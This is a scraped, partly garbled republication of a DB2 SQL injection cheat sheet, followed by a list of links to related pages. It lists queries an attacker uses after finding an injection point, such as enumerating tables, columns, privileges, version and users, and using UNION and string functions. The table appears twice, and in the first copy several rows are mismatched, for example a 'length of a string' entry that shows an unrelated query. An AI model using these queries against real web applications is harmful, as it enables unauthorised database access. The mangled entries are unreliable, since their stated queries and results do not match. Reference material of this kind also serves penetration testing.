DB2 SQL Injection Cheat Sheet
来源:互联网 发布:织梦head模板 编辑:程序博客网 时间:2024/06/04 23:23
Finding a SQL injection vulnerability in a web application backed by DB2 isn't too common in my experience. When you do find one, though it pays to be prepared...
Batching Queries Allowed?
???
Database Version
select system_user from sysibm.sysdummy1; Current Database
select current server from sysibm.sysdummy1;
Limiting Rows Returned
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
List Tables
select name from sysibm.systables;
List Columns
select name, tbname, coltype from sysibm.syscolumns;
List Databse Users and Passwords
Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;
FROM clause mandated in SELECTs? Yes, use sysibm.sysdummy1:
select 123 from sysibm.sysdummy1; UNION supported
Yes
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
Enumerate Tables Privs
select * from syscat.tabauth;
Enumerate Current Privs
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user; Length of a string select name, tbname, coltype from sysibm.syscolumns; -- returns 3
Bitwise AND
This page seems to indicate that DB2 has no support for bitwise operators!
Substring
select ascii('A') from sysibm.sysdummy1; -- returns 65 Character from ASCII value
select chr(65) from sysibm.sysdummy1; -- returns 'A' Roles and passwords
N/A (I think DB2 uses OS-level user accounts for authentication.) List Database Procedures
??? Create Users + Granting Privs ??? Time Delays
??? Execute OS Commands ??? Write to File System ??? Concatenation SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'
Casting SELECT cast('123' as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;
List schemas SELECT schemaname FROM syscat.schemata;
Below are some tabulated notes on how to do many of thing you'd normally do via SQL injection. All tests were performed on DB2 8.2 under Windows.
Description SQL / Comments Comments select blah from foo; -- comment like thisBatching Queries Allowed?
???
Database Version
select versionnumber, version_timestamp from sysibm.sysversions;
Current Database Userselect user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1; Current Database
select current server from sysibm.sysdummy1;
Limiting Rows Returned
SELECT foo FROM bar fetch first 1 rows only;
Returning N Rows starting at Offset M select name from (SELECT name FROM sysibm.systables order byname fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
List Tables
select name from sysibm.systables;
List Columns
select name, tbname, coltype from sysibm.syscolumns;
List Databse Users and Passwords
Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;
FROM clause mandated in SELECTs? Yes, use sysibm.sysdummy1:
select 123 from sysibm.sysdummy1; UNION supported
Yes
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
Enumerate Tables Privs
select * from syscat.tabauth;
Enumerate Current Privs
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user; Length of a string select name, tbname, coltype from sysibm.syscolumns; -- returns 3
Bitwise AND
This page seems to indicate that DB2 has no support for bitwise operators!
Substring
SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; -- returns b
ASCII value of a characterselect ascii('A') from sysibm.sysdummy1; -- returns 65 Character from ASCII value
select chr(65) from sysibm.sysdummy1; -- returns 'A' Roles and passwords
N/A (I think DB2 uses OS-level user accounts for authentication.) List Database Procedures
??? Create Users + Granting Privs ??? Time Delays
??? Execute OS Commands ??? Write to File System ??? Concatenation SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'
Casting SELECT cast('123' as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;
List schemas SELECT schemaname FROM syscat.schemata;
This page will probably remain a work-in-progress for some time yet. I'll update it as I learn more.
- DB2 SQL Injection Cheat Sheet
- SQL Injection Cheat Sheet
- sql injection cheat sheet
- SQL Injection Cheat Sheet
- MySQL SQL Injection Cheat Sheet
- SQL Injection Prevention Cheat Sheet
- MySQL SQL Injection Cheat Sheet
- MS access sql injection cheat sheet -version 0.2
- Sql injection in DB2
- Cheat Sheet
- Cheat Sheet
- 关于“cheat sheet”
- regular expressions cheat sheet
- Vim Cheat Sheet
- vi vim cheat sheet
- Rails Migration Cheat Sheet
- Watir Cheat Sheet
- WinDbg / SOS Cheat Sheet
- slackware12 网络设置
- Flash Lite 网上资源大搜集
- 不用Google Adsense的84个赚钱方法
- RAD Studio 2007就要来了
- 独立董事、内部董事、执行董事、外部董事、非执行董事概念
- DB2 SQL Injection Cheat Sheet
- JDK 7 中的 Fork/Join 模式
- Javascript的调试利器:Firebug使用详解
- 从J2ME学Symbian游戏开发(一)
- Linux安全隐患及加强安全管理
- 从J2ME学Symbian游戏开发(二)
- FreeBSD开发手册(一)
- FreeBSD开发手册(二)
- Why Can't Users See The Pick List Selection Requests For Old Orders?